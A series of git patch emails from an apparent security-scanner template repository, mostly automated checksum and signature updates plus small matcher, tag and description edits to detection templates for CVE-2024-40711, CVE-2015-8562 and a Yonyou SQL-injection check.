http/technologies/oracle/oracle-webcenter-sites.yaml:c7a9b11e4d45b1cab8351c0ee44a846023b5709f -http/technologies/oracle-fusion-detect.yaml:70e6adbea2ea3330ad37adc4afe139ee27784fc0 +http/technologies/oracle-fusion-detect.yaml:ebe36a57c0571fea97ff38568d46092cf813c7a3 http/technologies/oracle-httpserver-12c.yaml:b0764e65825e393276257c9643fb8866ce0249d5 http/technologies/orbit-telephone-detect.yaml:3899085ee5a2199f71c37bb9dffe78d55d128138 http/technologies/osquery-fleet-detect.yaml:d187b3e01db1fde4a6e3d40ced5c3b348f3fa73f @@ -9211,6 +9211,7 @@ http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml:053fcb11256eef5a62c09c7c6cb http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml:3a975b7bbbfcebf3e5c188bcdd14cd7a3adfbcd2 http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml:1dc3dc257a37960cfc7f288764e3299a99097e0e http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml:e9e201ac2d626d5305fc854a70b1c11166afd2fb +http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml:f8fc6240fdc88207310d77ac0a56b7728aac8685 http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml:ad806552bd9cebde1708802b2e820cca481f63e4 http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml:0930098b37e392d1cf4cdb778b74bba6a2376e3e http/vulnerabilities/yonyou/yonyou-ufida-nc-cloud-sqli.yaml:9b8432d7623ccede4cf5d80aa97b9bbde0592535 @@ -9471,7 +9472,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5059230afa0b4592bc5979eb90f86864b365d423 +templates-checksum.txt:7afac0c2d99e562e981ab6095b48234b2107de70 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7110667d97ee6b3ee1c2e51bcc52abd3bf1b9ee6 Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 07:58:55 +0000 Subject: [PATCH 110/218] =?UTF-8?q?chore:=20sign=20templates=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- http/cves/2024/CVE-2024-43360.yaml | 3 +-- http/exposed-panels/veritas-netbackup-panel.yaml | 5 ++--- http/technologies/accellion-detect.yaml | 5 ++--- http/technologies/oracle-fusion-detect.yaml | 5 ++--- http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml | 2 ++ 5 files changed, 9 insertions(+), 11 deletions(-) diff --git a/http/cves/2024/CVE-2024-43360.yaml b/http/cves/2024/CVE-2024-43360.yaml index b63eeb6dc1..ba708fd24e 100644 --- a/http/cves/2024/CVE-2024-43360.yaml +++ b/http/cves/2024/CVE-2024-43360.yaml @@ -41,5 +41,4 @@ http: - 'contains(content_type,"application/json")' - 'status_code == 200' condition: and - -# digest: 4b0a00483046022100ce6e40553c3349c94d9cb312e4d6dc3e61ef6f7841ddfdea24a850f398eb9a560221008b3f432c85e96060b42aa047cc8ac87d6ee6b3618f258a0b1682c185f068bca3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205d3cb11ead82efea1de241689604996e5384562e31cadb210c21d6ac0ba3c690022100aff24a491bddee20365406460ed7e73170ef3768234692f60c76d4d87d6c51bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/veritas-netbackup-panel.yaml b/http/exposed-panels/veritas-netbackup-panel.yaml index 72fa69aa52..56688a827a 100644 --- a/http/exposed-panels/veritas-netbackup-panel.yaml +++ b/http/exposed-panels/veritas-netbackup-panel.yaml @@ -28,6 +28,5 @@ http: - type: status status: - - 200 - -# digest: 4b0a00483046022100bbe69cde0f6acbc2464d3885683f90d4694eb3fc3a23b14345fda74bb593008a022100d0996a483f798f124cbe14266c8f50e7f3496435bd1e39c6ba6241d4101fd7bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - 200 +# digest: 4a0a00473045022100aae7c24c1b275e2b7f5090b2f5edd0730740a14f3394b0df694d6e8278c1830002207b203080262845c5af9bd9067d76fe44f4cc8b2abfbe27d84bc4c25805cf9c96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/accellion-detect.yaml b/http/technologies/accellion-detect.yaml index 27ad17a0f1..4a93768a48 100644 --- a/http/technologies/accellion-detect.yaml +++ b/http/technologies/accellion-detect.yaml @@ -28,6 +28,5 @@ http: - type: status status: - - 200 - -# digest: 490a004630440220528d2b4b6595f7c7c7ec9e565d94da87a9e120afdb6e63823c94f91c43a77deb0220404f2e903aaeaeb082f0706b08bb5f49202e5583e7d6f3da92997b41af7d84e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - 200 +# digest: 4a0a00473045022064cf473925e3ee1aef47e835cf3a11b9aa04038eadab6b88fdb7d9a83d3b1ee502210084c56386fa1cc923ff3feab4e2f379b9520392dd804ceb5ef54229e3434184a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/oracle-fusion-detect.yaml b/http/technologies/oracle-fusion-detect.yaml index ed217d927d..07054e069f 100644 --- a/http/technologies/oracle-fusion-detect.yaml +++ b/http/technologies/oracle-fusion-detect.yaml @@ -26,6 +26,5 @@ http: - type: status status: - - 200 - -# digest: 4a0a00473045022100c4c246e35f687de0b355e79639309d781ca959d35ce0538ecd0e8de148336ce702206b46bfc8c2f1939fb037a67375b7b420d71063bccd2b6b4e6e49e957db2609de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - 200 +# digest: 4b0a00483046022100be299dbe97747cc46358f3ece4b2f036d0bf74167ec7d44212289a295d199752022100d8bdde86185348b83eeba82f820e4c3c1aec6a1da64e77fb436b0aff14b1772c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml index 9b6210efd6..ebc14ab5bd 100644 --- a/http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml +++ b/http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml @@ -29,3 +29,5 @@ http: - 'contains(body, "{\"success\":true}")' - 'status_code == 200' condition: and + +# digest: 4a0a00473045022100dbcb77673c8883415cf8082ba3da06be566214bfaaa31ebe5a07791afb42194e0220644ba5a5c35c47c7e1cbe462bc8c84b2569645af78a9d72450090a906a866716:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 138f1498cd8b5efcc74b7b9135d0cfa0a19852f8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 15 Oct 2024 11:59:55 +0400 Subject: [PATCH 111/218] Update CVE-2024-40711.yaml --- passive/cves/2024/CVE-2024-40711.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/passive/cves/2024/CVE-2024-40711.yaml b/passive/cves/2024/CVE-2024-40711.yaml index ec69303f05..8c5f37d8c8 100644 --- a/passive/cves/2024/CVE-2024-40711.yaml +++ b/passive/cves/2024/CVE-2024-40711.yaml @@ -5,10 +5,11 @@ info: author: rootxharsh,iamnoooob,DhiyaneshDK severity: critical description: | - A remote code execution in Veeam Backup & Replication can be exploited without authentication. + A deserialization of untrusted data vulnerability with a malicious payload can allow an unauthenticated remote code execution (RCE). reference: - https://x.com/codewhitesec/status/1831720125747069389?s=46 - https://www.veeam.com/kb4649 + - https://nvd.nist.gov/vuln/detail/CVE-2024-40711 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -34,8 +35,8 @@ http: - type: word part: body words: - - "databaseVendor" - - "databaseContentVersion" + - '"databaseVendor":' + - '"databaseContentVersion":' condition: and - type: word From 5a8ff0982687646db3a8e1535b8ea938570ba684 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 15 Oct 2024 12:01:52 +0400 Subject: [PATCH 112/218] Update root-path-disclosure.yaml --- http/misconfiguration/root-path-disclosure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/root-path-disclosure.yaml b/http/misconfiguration/root-path-disclosure.yaml index 288fb10ca7..482112ff4b 100644 --- a/http/misconfiguration/root-path-disclosure.yaml +++ b/http/misconfiguration/root-path-disclosure.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 4 - tags: misconfig,exposure,info-leak,listing + tags: misconfig,exposure,info-leak,listing,lfr http: - method: GET From 710a84a4b6bec166564246109456cd335c7d5154 Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 08:03:13 +0000 Subject: [PATCH 113/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c5e981bfa4..b4427cbc19 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -878,7 +878,7 @@ headless/extract-urls.yaml:499408f8b8d77cb5315ed584ac23c90328823a3f headless/headless-open-redirect.yaml:b18cf92bc09eff3df48ca7c7e4f0c6d4fef9b97c headless/postmessage-outgoing-tracker.yaml:ab46f9315290cbae87c53ef2e270ae5659263bb4 headless/postmessage-tracker.yaml:50ac0789131cde4f308a4bbf78928549aed7e9ef -headless/prototype-pollution-check.yaml:e7e9713474a3f7376073cb23ae5f878973238f65 +headless/prototype-pollution-check.yaml:537e9af39c60cbf232b41dafb8dd20d5233e1b8e headless/screenshot.yaml:037205c1a1cb5617d119da0a545d1d6742629ef4 headless/technologies/js-libraries-detect.yaml:5c62ba8ad03afb53da2856ea757fe4fd20694567 headless/technologies/sap-spartacus.yaml:fd0c71b102c08d82bbc848c59b83b92634d13cc6 @@ -3808,7 +3808,7 @@ http/cves/2024/CVE-2024-41955.yaml:226ee0e7732a2e17b312776ac8c020ca60dad2e3 http/cves/2024/CVE-2024-4257.yaml:76768a186c284a20129bc8f67a2c620f8c1fc7ac http/cves/2024/CVE-2024-4295.yaml:7c3e58627bc8d2cfbeba41d4e5b02805b06aac35 http/cves/2024/CVE-2024-43160.yaml:d5baeeff92f97904c3b6202e25f3160dfa6d4111 -http/cves/2024/CVE-2024-43360.yaml:92e96f83e19172be9f5c21ee711d6ea4b68b8946 +http/cves/2024/CVE-2024-43360.yaml:3f356b02751421cf88296936e0ae88b0938d99e8 http/cves/2024/CVE-2024-43425.yaml:c5d55fa9159426dcb15d374d7c51b13a1050e71d http/cves/2024/CVE-2024-4348.yaml:b875149da3d86eb5be674c5f5e93606f3d448a06 http/cves/2024/CVE-2024-4358.yaml:13a3a1250e1529ffc91043931bb2fc322998103f @@ -5174,7 +5174,7 @@ http/exposed-panels/veeam-backup-azure-panel.yaml:986e549ba8272b1fb4f420b0d61688 http/exposed-panels/veeam-backup-gcp.yaml:aab3a1d4ae28dcf4b95489527150abf7a4fe0a13 http/exposed-panels/veeam-backup-manager-login.yaml:61c42ca2d709d88a6a251af450c32a104f31e4d0 http/exposed-panels/veeam-panel.yaml:ef98410c87107e18e3d656564a62ff6b7c3b0641 -http/exposed-panels/veritas-netbackup-panel.yaml:3800cdd0bf4c67de52c9e499f28dda930a6fda18 +http/exposed-panels/veritas-netbackup-panel.yaml:0e9d2e18cdd86b0e1ae6da1cd7c966fe124c4ed9 http/exposed-panels/veriz0wn-osint.yaml:cbe524b980c87bf0780cee3aff662797153c985c http/exposed-panels/verizon-router-panel.yaml:00f0e5b59dcdf35b9189083bb937f08b2f7f2eaf http/exposed-panels/versa/versa-director-login.yaml:47ffd24a1f341115a7fdaba21247cec54c2d36d1 @@ -7387,7 +7387,7 @@ http/takeovers/wufoo-takeover.yaml:c1c249c1e3c0063ec554758226124e79690f0203 http/takeovers/zendesk-takeover.yaml:07d1b4e0c335df7286a7ded110889241922db44d http/technologies/4D-detect.yaml:a995aa1b0b3b6761e5e90deb18a96d57494bb9be http/technologies/abyss-web-server.yaml:2fffb4cde6c7f55d76d6e75695407b177e97455f -http/technologies/accellion-detect.yaml:da043d27e8aa6996c6a002ba059ea3a45052f1b5 +http/technologies/accellion-detect.yaml:df310c5eeaf7c94d66445ca4bc745bfa72e87626 http/technologies/acontent-detect.yaml:3a895300f93df22d858994bf6851a82f9d38c7d9 http/technologies/activecollab-detect.yaml:8b9ebce3700960b0e8eac3b5f328117f9ac1b9fe http/technologies/adfs-detect.yaml:c6cdb0d6cd9a83ffb3031fa3c516db8754023aa2 @@ -7714,7 +7714,7 @@ http/technologies/oracle/oracle-dbass-detect.yaml:b8eb13459d727a34bde146f1265c28 http/technologies/oracle/oracle-dbcs.yaml:e78c33ba82de173522e2177e94b59a1d3cd47bd6 http/technologies/oracle/oracle-iplanet-web-server.yaml:c8e44527ca1e4cbeb8bc3b1edb60290f7d8dbb0d http/technologies/oracle/oracle-webcenter-sites.yaml:c7a9b11e4d45b1cab8351c0ee44a846023b5709f -http/technologies/oracle-fusion-detect.yaml:ebe36a57c0571fea97ff38568d46092cf813c7a3 +http/technologies/oracle-fusion-detect.yaml:d07b77fd817cd3b67dcc5d306f5c2151a00897e9 http/technologies/oracle-httpserver-12c.yaml:b0764e65825e393276257c9643fb8866ce0249d5 http/technologies/orbit-telephone-detect.yaml:3899085ee5a2199f71c37bb9dffe78d55d128138 http/technologies/osquery-fleet-detect.yaml:d187b3e01db1fde4a6e3d40ced5c3b348f3fa73f @@ -9211,7 +9211,7 @@ http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml:053fcb11256eef5a62c09c7c6cb http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml:3a975b7bbbfcebf3e5c188bcdd14cd7a3adfbcd2 http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml:1dc3dc257a37960cfc7f288764e3299a99097e0e http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml:e9e201ac2d626d5305fc854a70b1c11166afd2fb -http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml:f8fc6240fdc88207310d77ac0a56b7728aac8685 +http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml:1d02ed137fd29046bd601d422665ddc1ffb66e3d http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml:ad806552bd9cebde1708802b2e820cca481f63e4 http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml:0930098b37e392d1cf4cdb778b74bba6a2376e3e http/vulnerabilities/yonyou/yonyou-ufida-nc-cloud-sqli.yaml:9b8432d7623ccede4cf5d80aa97b9bbde0592535 @@ -9472,7 +9472,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7afac0c2d99e562e981ab6095b48234b2107de70 +templates-checksum.txt:52b494a928eaf6c2746fa790d9c6ddbb0d82efe5 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a1538ae2d48abfa14c2d80e5238dab3d63326486 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 15 Oct 2024 12:03:53 +0400 Subject: [PATCH 114/218] Update CVE-2015-8562.yaml --- http/cves/2015/CVE-2015-8562.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/http/cves/2015/CVE-2015-8562.yaml b/http/cves/2015/CVE-2015-8562.yaml index d3fcf89625..7c3b1157ec 100644 --- a/http/cves/2015/CVE-2015-8562.yaml +++ b/http/cves/2015/CVE-2015-8562.yaml @@ -50,8 +50,11 @@ http: matchers-condition: and matchers: - type: word + part: body words: + - "PHP Extension" - "PHP Version" + condition: and - type: status status: From c09afef7c2cf42c6635233f91f826db669c6185f Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 08:04:39 +0000 Subject: [PATCH 115/218] =?UTF-8?q?chore:=20sign=20templates=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- headless/prototype-pollution-check.yaml | 3 +-- http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml | 3 +-- 2 files changed, 2 insertions(+), 4 deletions(-) diff --git a/headless/prototype-pollution-check.yaml b/headless/prototype-pollution-check.yaml index 7788abb55f..db20e8d381 100644 --- a/headless/prototype-pollution-check.yaml +++ b/headless/prototype-pollution-check.yaml @@ -170,5 +170,4 @@ headless: part: extract8 words: - "polluted" - -# digest: 490a0046304402203ff07b0c962c43a69dfc76af68fa56d67e2a9fd360759cc049f60b0881de88c402207dbfca6a94102f5a72926b28b0d10c3e80ad752625090dfb46f31c1774758f99:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220332d2eb43e6ee2b3b48ca3bd7b953693814ce81ca3c34fa2036bcbfc93482d6a02204efa7ecda7b863d46e7a42d80500a115097ba317b63547ed5c07a4124338dafc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml index ebc14ab5bd..8c02f3a6dd 100644 --- a/http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml +++ b/http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml @@ -29,5 +29,4 @@ http: - 'contains(body, "{\"success\":true}")' - 'status_code == 200' condition: and - -# digest: 4a0a00473045022100dbcb77673c8883415cf8082ba3da06be566214bfaaa31ebe5a07791afb42194e0220644ba5a5c35c47c7e1cbe462bc8c84b2569645af78a9d72450090a906a866716:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220535732178e824c68b912ae20a8e274cd947c0dfba5285f679b0fbdcd9d39a59a02204887bdb85630f5121f9e721cea27a49e41df2d5e920f55be3295748b656aa8e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 127fb3b87ec8d477ea0ad65a67fd30b103ef001a Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 08:05:34 +0000 Subject: [PATCH 116/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 559abe7024..292c4b9ee5 100644 --- a/.new-additions +++ b/.new-additions @@ -12,3 +12,4 @@ http/technologies/mirth-connect-detect.yaml http/technologies/oracle-fusion-detect.yaml http/technologies/wordpress/plugins/burst-statistics.yaml http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml +passive/cves/2024/CVE-2024-40711.yaml From 7b5febafc882125f5c8729b38b9b9f9a36fc1d31 Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 08:06:46 +0000 Subject: [PATCH 117/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 292c4b9ee5..df750fe451 100644 --- a/.new-additions +++ b/.new-additions @@ -7,6 +7,7 @@ http/exposed-panels/traccar-panel.yaml http/exposed-panels/txadmin-panel.yaml http/exposed-panels/veritas-netbackup-panel.yaml http/exposed-panels/vmware-aria-panel.yaml +http/misconfiguration/root-path-disclosure.yaml http/technologies/accellion-detect.yaml http/technologies/mirth-connect-detect.yaml http/technologies/oracle-fusion-detect.yaml From 71d74c18db1fb54cf78d03e142b36328284f4aee Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 08:07:19 +0000 Subject: [PATCH 118/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b4427cbc19..a03cd03015 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -878,7 +878,7 @@ headless/extract-urls.yaml:499408f8b8d77cb5315ed584ac23c90328823a3f headless/headless-open-redirect.yaml:b18cf92bc09eff3df48ca7c7e4f0c6d4fef9b97c headless/postmessage-outgoing-tracker.yaml:ab46f9315290cbae87c53ef2e270ae5659263bb4 headless/postmessage-tracker.yaml:50ac0789131cde4f308a4bbf78928549aed7e9ef -headless/prototype-pollution-check.yaml:537e9af39c60cbf232b41dafb8dd20d5233e1b8e +headless/prototype-pollution-check.yaml:f86ea6025d5b28780deece4272753eadbd6bd2ce headless/screenshot.yaml:037205c1a1cb5617d119da0a545d1d6742629ef4 headless/technologies/js-libraries-detect.yaml:5c62ba8ad03afb53da2856ea757fe4fd20694567 headless/technologies/sap-spartacus.yaml:fd0c71b102c08d82bbc848c59b83b92634d13cc6 @@ -6415,6 +6415,7 @@ http/misconfiguration/rekognition-image-validation.yaml:320e0300b3a242448eeb3ac6 http/misconfiguration/repetier-unauth.yaml:49e1a9eb30a8a755654e401669d9a39e3c09e3a7 http/misconfiguration/request-baskets-exposure.yaml:02d2c2b167c7281ef3c0e9315f05507f2270c827 http/misconfiguration/rethinkdb-admin-console.yaml:5898dfe2d5c65ff468a51596226569ab87ea6d17 +http/misconfiguration/root-path-disclosure.yaml:7a650fc89c2bb89b16fe8f6ba17b305e1b265333 http/misconfiguration/roxyfileman-fileupload.yaml:ed5188248f91ec32600369efa8f74eeb68ec3441 http/misconfiguration/s3-torrent.yaml:cb8cf43a0671794f2618c3cadc81a768a775d857 http/misconfiguration/salesforce-aura.yaml:855d650ee81f9e1640873673b7e7aaaf8a1f88f3 @@ -9211,7 +9212,7 @@ http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml:053fcb11256eef5a62c09c7c6cb http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml:3a975b7bbbfcebf3e5c188bcdd14cd7a3adfbcd2 http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml:1dc3dc257a37960cfc7f288764e3299a99097e0e http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml:e9e201ac2d626d5305fc854a70b1c11166afd2fb -http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml:1d02ed137fd29046bd601d422665ddc1ffb66e3d +http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml:863c7dc541872dcf963d4224201ce604030d618f http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml:ad806552bd9cebde1708802b2e820cca481f63e4 http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml:0930098b37e392d1cf4cdb778b74bba6a2376e3e http/vulnerabilities/yonyou/yonyou-ufida-nc-cloud-sqli.yaml:9b8432d7623ccede4cf5d80aa97b9bbde0592535 @@ -9425,6 +9426,7 @@ network/misconfig/tidb-unauth.yaml:31f8d2286bd7557d53f7ff18011a9ec7732ca117 network/misconfig/unauth-psql.yaml:321787e18e6164df765b26b771bd22606f3cd55d network/vulnerabilities/clockwatch-enterprise-rce.yaml:1174218309884e2cc7b11eb461395217c3cf1e95 passive/cves/2024/CVE-2024-25723.yaml:7eb36ba743582e6c04a324131d789035b7e6d72c +passive/cves/2024/CVE-2024-40711.yaml:a6543ec7d54dc5854e96b482d90ed19f84931156 profiles/README.md:84e7479141844434737d87eea1ab678c04d11c33 profiles/all.yml:29a13b0b8f2933e1af3fefddd2d0761b439dc01f profiles/aws-cloud-config.yml:62e4b0c8d93906ff00ab4785b5725f8799101f68 @@ -9472,7 +9474,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:52b494a928eaf6c2746fa790d9c6ddbb0d82efe5 +templates-checksum.txt:21a8f4ac4cc1ab6c8eee9d7e2e1d0d323d3a17fd wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 444638e7a457dad94b54bb2831ef92414ef9533a Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 08:08:42 +0000 Subject: [PATCH 119/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index df750fe451..3f1bf09136 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +http/cves/2015/CVE-2015-8562.yaml http/cves/2024/CVE-2024-39713.yaml http/cves/2024/CVE-2024-43360.yaml http/cves/2024/CVE-2024-44349.yaml From 8c484f637626e30f7ab6e793c1babb0a2da924bf Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 08:08:52 +0000 Subject: [PATCH 120/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a03cd03015..2488e183c0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1537,6 +1537,7 @@ http/cves/2015/CVE-2015-7780.yaml:353b0363275dc05f4d2f6c352a61b80eedc1de43 http/cves/2015/CVE-2015-7823.yaml:037fa0a802e5e6081be7d50f78227d296733ad25 http/cves/2015/CVE-2015-8349.yaml:856790657d418e60710c440179383bf5528db0b6 http/cves/2015/CVE-2015-8399.yaml:a504f142c32f0e890063057088ffb8c3b39c4a74 +http/cves/2015/CVE-2015-8562.yaml:420d51eab73b7d1d3dd7546e565d5bc7938e6938 http/cves/2015/CVE-2015-8813.yaml:6871ac55ac5ff533b2f5d8965baf1eefee256f9f http/cves/2015/CVE-2015-9312.yaml:7cc0a19a624945d3fde03ebd0ba95c2c6e3c9410 http/cves/2015/CVE-2015-9323.yaml:35c614423d01772c2c72b1287a264bb350109ecc @@ -9474,7 +9475,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:21a8f4ac4cc1ab6c8eee9d7e2e1d0d323d3a17fd +templates-checksum.txt:b7dfc9dbc6058137bf7794330964392ada678b3f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d56d7a8ab3c46c9ff41396e3feabf0f67a708e84 Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 08:10:15 +0000 Subject: [PATCH 121/218] =?UTF-8?q?chore:=20sign=20templates=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- http/cves/2015/CVE-2015-8562.yaml | 2 ++ http/misconfiguration/root-path-disclosure.yaml | 2 ++ 